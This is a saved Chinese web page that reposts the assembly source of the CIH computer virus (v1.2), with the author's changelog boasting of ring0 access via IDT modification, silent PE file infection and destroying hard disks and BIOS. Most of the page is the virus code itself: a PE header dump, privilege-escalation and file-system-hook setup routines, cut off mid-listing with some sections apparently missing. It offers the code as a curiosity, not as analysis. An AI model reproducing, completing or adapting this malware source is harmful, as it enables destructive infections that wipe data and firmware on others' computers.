📄 cih源代码.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0027)http://hot.qd58.com/cih.htm -->
<!-- saved from url=(0038)http://grrl.myrice.com/dddd/hkwxer.htm --><HTML><HEAD><TITLE>CIH原代码</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2800.1106" name=GENERATOR>
<META content=FrontPage.Editor.Document name=ProgId>
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
P {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
BR {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
A:link {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:active {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:hover {
COLOR: #c0c0c0; TEXT-DECORATION: none
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
</STYLE>
<STYLE type=text/css>BODY {
SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #999999; SCROLLBAR-3DLIGHT-COLOR: #999999; SCROLLBAR-ARROW-COLOR: #999999; SCROLLBAR-TRACK-COLOR: #e8e8e8; SCROLLBAR-DARKSHADOW-COLOR: #ffffff; SCROLLBAR-BASE-COLOR: #336699
}
</STYLE>
<STYLE type=text/css>BODY {
FONT-SIZE: 12px; LINE-HEIGHT: 150%
}
</STYLE>
</HEAD>
<BODY bgColor=#e8e8e8>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD width="100%"><FONT color=#800000>+++CIH原代码+++</FONT></TD></TR>
<TR>
<TD><FONT
color=#808000>------------------------------------------------喜欢编程的一定对他很感兴趣,但是偶不会编程。</FONT></TD></TR>
<TR>
<TD><FONT size=2>;
****************************************************************************
<P>; * The Virus Program Information *</P>
<P>;
****************************************************************************</P>
<P>; * *</P>
<P>; * Designer : CIH Original Place : TTIT of Taiwan *</P>
<P>; * Create Date : 04/26/1998 Now Version : 1.2 *</P>
<P>; * Modification Time : 05/21/1998 *</P>
<P>; * *</P>
<P>;
*==========================================================================*</P>
<P>; * Modification History *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.0 1. Create the Virus Program. *</P>
<P>; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *</P>
<P>; * 04/26/1998 3. Virus Code doesn't Reload into System. *</P>
<P>; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *</P>
<P>; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *</P>
<P>; * 6. When System Opens Existing PE File, the File will be *</P>
<P>; * Infected, and the File doesn't be Reinfected. *</P>
<P>; * 7. It is also Infected, even the File is Read-Only. *</P>
<P>; * 8. When the File is Infected, the Modification Date and Time *</P>
<P>; * of the File also don't be Changed. *</P>
<P>; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *</P>
<P>; * Previous FileSystemApiHook, it will Call the Function *</P>
<P>; * that the IFS Manager Would Normally Call to Implement *</P>
<P>; * this Particular I/O Request. *</P>
<P>; * 10. The Virus Size is only 656 Bytes. *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.1 1. Especially, the File that be Infected will not Increase
*</P>
<P>; * it's Size... ^__^ *</P>
<P>; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *</P>
<P>; * When Exception Error Occurs, Our OS System should be in *</P>
<P>; * Windows NT. So My Cute Virus will not Continue to Run, *</P>
<P>; * it will Jmup to Original Application to Run. *</P>
<P>; * 3. Use Better Algorithm, Reduce Virus Code Size. *</P>
<P>; * 4. The Virus "Basic" Size is only 796 Bytes. *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *</P>
<P>; * 2. Modify the Bug of v1.1 *</P>
<P>; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *</P>
<P>;
****************************************************************************</P>
<P> </P>
<P>.586P</P>
<P> </P>
<P>;
****************************************************************************</P>
<P>; * Original PE Executable File(Don't Modify this Section) *</P>
<P>;
****************************************************************************</P>
<P> </P>
<P>OriginalAppEXE SEGMENT</P>
<P> </P>
<P>FileHeader:</P>
<P>db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h</P>
<P>db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h</P>
<P>db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh</P>
<P>db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h</P>
<P>db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h</P>
<P>db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh</P>
<P>db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh</P>
<P>db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h</P>
<P>db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah</P>
<P>db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h</P>
<P>db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h</P>
<P>db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h</P>
<P>; *********************************************************</P>
<P>HookExceptionNumber = 03h</P>
<P> </P>
<P>ENDIF</P>
<P> </P>
<P> </P>
<P>FileNameBufferSize = 7fh</P>
<P> </P>
<P>; *********************************************************</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusGame SEGMENT</P>
<P> </P>
<P>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame</P>
<P>ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring3 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyVirusStart:</P>
<P>push ebp</P>
<P> </P>
<P>; * IDT(Interrupt Descriptor Table) *</P>
<P>; * to Get Ring0 Privilege... *</P>
<P>; *************************************</P>
<P> </P>
<P>push eax ;</P>
<P>sidt [esp-02h] ; Get IDT Base Address</P>
<P>pop ebx ;</P>
<P> </P>
<P>add ebx, HookExceptionNumber*08h+04h ; ZF = 0</P>
<P> </P>
<P>cli</P>
<P> </P>
<P>mov ebp, [ebx] ; Get Exception Base</P>
<P>mov bp, [ebx-04h] ; Entry Point</P>
<P> </P>
<P>lea esi, MyExceptionHook-@1[ecx]</P>
<P> </P>
<P>push esi</P>
<P> </P>
<P>mov [ebx-04h], si ;</P>
<P>shr esi, 16 ; Modify Exception</P>
<P>mov [ebx+02h], si ; Entry Point Address</P>
<P> </P>
<P>pop esi</P>
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception to Get Ring0 *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException</P>
<P>ReturnAddressOfEndException = $</P>
<P> </P>
<P>; *************************************</P>
<P>; * Merge All Virus Code Section *</P>
<P>; *************************************</P>
<P> </P>
<P>push esi</P>
<P>mov esi, eax</P>
<P> </P>
<P>LoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>mov ecx, [eax-04h]</P>
<P> </P>
<P>rep movsb</P>
<P> </P>
<P>sub eax, 08h</P>
<P> </P>
<P>mov esi, [eax]</P>
<P> </P>
<P>or esi, esi</P>
<P>jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1</P>
<P> </P>
<P>jmp LoopOfMergeAllVirusCodeSection</P>
<P> </P>
<P>QuitLoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>pop esi</P>
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception Again *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException Aga</P>
<P> </P>
<P> </P>
<P>; *************************************</P>
<P>; * Let's Restore *</P>
<P>; * Structured Exception Handing *</P>
<P>; *************************************</P>
<P> </P>
<P>ReadyRestoreSE:</P>
<P>sti</P>
<P> </P>
<P>xor ebx, ebx</P>
<P> </P>
<P>jmp RestoreSE</P>
<P> </P>
<P>; *************************************</P>
<P>; * When Exception Error Occurs, *</P>
<P>; * Our OS System should be in NT. *</P>
<P>; * So My Cute Virus will not *</P>
<P>; * Continue to Run, it Jmups to *</P>
<P>; * Original Application to Run. *</P>
<P>; *************************************</P>
<P> </P>
<P>StopToRunVirusCode:</P>
<P>@1 = StopToRunVirusCode</P>
<P> </P>
<P>xor ebx, ebx</P>
<P>mov eax, fs:[ebx]</P>
<P>mov esp, [eax]</P>
<P> </P>
<P>RestoreSE:</P>
<P>pop dword ptr fs:[ebx]</P>
<P>pop eax</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return Original App to Execute *</P>
<P>; *************************************</P>
<P> </P>
<P>pop ebp</P>
<P> </P>
<P>push 00401000h ; Push Original</P>
<P>OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack</P>
<P> </P>
<P>ret ; Return to Original App Entry Point</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring0 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyExceptionHook:</P>
<P>@2 = MyExceptionHook</P>
<P> </P>
<P>jz InstallMyFileSystemApiHook</P>
<P> </P>
<P>; *************************************</P>
<P>; * Do My Virus Exist in System !? *</P>
<P>; *************************************</P>
<P> </P>
<P>mov ecx, dr0</P>
<P>jecxz AllocateSystemMemoryPage</P>
<P> </P>
<P>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf</P>
<P>dException</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return to Ring3 Initial Program *</P>
<P>; *************************************</P>
<P> </P>
<P>ExitRing0Init:</P>
<P>mov [ebx-04h], bp ;</P>
<P>shr ebp, 16 ; Restore Exception</P>
<P>mov [ebx+02h], bp ;</P>
<P> </P>
<P>iretd</P>
<P> </P>
<P>; *************************************</P>
<P>; * Allocate SystemMemory Page to Use *</P>
<P>; *************************************</P>
<P> </P>
<P>AllocateSystemMemoryPage:</P>
<P> </P>
<P>mov dr0, ebx ; Set the Mark of My Virus Exis</P>
<P>in System</P>
<P> </P>
<P>push 00000000fh ;</P>
<P>push ecx ;</P>
<P>push 0ffffffffh ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -